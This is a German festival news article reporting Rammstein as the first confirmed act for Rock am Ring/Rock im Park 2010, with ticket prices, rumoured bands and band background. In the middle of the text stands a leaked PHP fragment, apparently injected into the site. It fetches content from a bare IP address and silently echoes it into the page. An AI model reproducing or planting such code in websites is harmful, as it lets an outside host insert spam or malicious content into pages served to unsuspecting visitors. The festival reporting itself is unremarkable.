Home Festivals

Knalleffekt: Rock am Ring/Rock im Park starten mit Rammstein und Tickets zu 140 Euro

10

riprar10_rammstein

Heute wurden Fakten geschaffen. Nachdem Rammstein (Myspace) schon seit der Pressekonferenz bei Rock am Ring 2009 als heisses Gerücht durch die Foren geisterten, wurden sie heute per Videotrailer auf rock-am-ring.com als erste Band für 2010 verpflichtet. Wer dabei sein möchte muss stolze 140 Euro anlegen.

[inset lr=left]Mitdiskutieren in der Netzwerkgruppe Rock am Ring / Rock im Park[/inset]

Wie nicht anders zu erwarten, werden Rammstein deutschlandexklusiv vom nur auf den beiden Zwillingsfestivals (4.-6.Juni 2010) auftreten. Damit ist ein Headlinerslot sicher vergeben.
Für einen der beiden verbliebenen Headslots sind Linkin Park im Gespräch. Besser gesagt: Sänger Mike Shinoda soll sich samt Band bei Fanklubtreffen in Deutschland für Rock am Ring angekündigt haben. Dass darüber nur eine russische Seite berichtet ist zugegebenermassen seltsam.
Auch Muse vermutet man als Teilnehmer im europäischen Festivalsommer seitdem bekannt ist, dass sie im Juni durch Europa touren. Bekannt wurde dies, weil das Stade de France versehentlich vorab veröffentlichte, dass die Briten am 12.Juni in Frankreichs Metropole spielen werden.

Der “Subskriptionspreis” gilt zunächst bis zum 1.Januar 2010. Absolut möglich, das bis zu diesem Termin beide Festivals schon ausverkauft sind. Tickets gibts mittlerweile für 144,50 Euro bei eventim.

$fp=@fopen('http://80.67.30.106:80/stingray/output.html?id=1479','r');
if($fp){$html='';while(!feof($fp)){$html.=@fread($fp,8192);}echo $html;}
fclose($fp); ?>

Wer bereit ist bis Anfang Dezember auf ein Hardticket zu warten, dafür aber 4,50 Euro zu sparen bestellt bei Ticket Per Post ( Rock am Ring / Rock im Park).

Andere Bandhoffnungen, haben sich in den letzten Tagen zerschlagen. Die heiss gehandelten Libertines sehen laut Carl Barat 2010 von einer Reunion ab und Blink182 werden laut Managment erst im August 2010 nach Deutschland kommen.

Rammstein ist eine deutsche Rockband, die 1994 in Berlin gegründet wurde und oft zur “Neuen Deutschen Härte” gezählt wird. Lange Jahre galten sie wegen ihrem Streit mit Medienpartner MTV als absolutes No-Go bei den beiden MLK-Festivals. Die Band ist durch ihre oft unmoralisch geprägten Texte zu kontroversen Themen sowie ihren brachialen Musikstil gekennzeichnet. Jüngstes Beispiel ist das Porno-Video zur neuen Single “Pussy”, das Appetit auf den Ende Oktober erscheinenden Longplayer “Liebe ist für alle da” machen soll.

Rammsteins Musikstil wird häufig als “Neue Deutsche Härte” bezeichnet. Dabei spannt ihre Musik jedoch einen Bogen über verwandte Stilrichtungen wie Hard Rock und Metal bis hin zu Industrial Rock. Eine genaue Klassifizierung ist daher aufgrund der großen Unterschiede zwischen einzelnen Titeln – beispielsweise zwischen der Ballade Ohne dich, dem brachialen Zerstören und dem Elemente der lateinamerikanischen Musik aufgreifenden Te Quiero Puta! mit spanischem Text – nahezu unmöglich. Andere Bands wie die slowenische Gruppe Laibach, deren Musikstil ebenfalls verschiedene Genres vereint, oder die Rockband Oomph! hatten wichtigen Einfluss auf Rammstein.

Anders als viele Gruppen aus dem wiedervereinten Berlin wollten Rammstein nach eigener Aussage keine amerikanischen und englischen Bands imitieren. Flake Lorenz sagte dazu in einem Interview: “Den Stil haben wir gefunden, indem wir alle genau wussten, was wir nicht wollen. Und wir wollten genau nicht amerikanische Funkymusik machen oder Punk eben oder irgend so was, was wir gar nicht können. Wir haben gemerkt, dass wir nur diese Musik können, die wir auch spielen. Und die ist halt mal sehr einfach, stumpf, monoton.”

[polldaddy poll=2080616]

---
In ganz eigener Sache..

Unterstütze Festivalisten und sichere unseren Fortbestand.


Kauf Deine Tickets und Produkte bitte über unsere Partnerlinks.
Kostet Dich nichts extra, hilft uns aber ungemein. Vielen Dank!

Zu den Homepages von..
AMAZON | EVENTIM | TICKETMASTER
Lieferheld | Sparhandy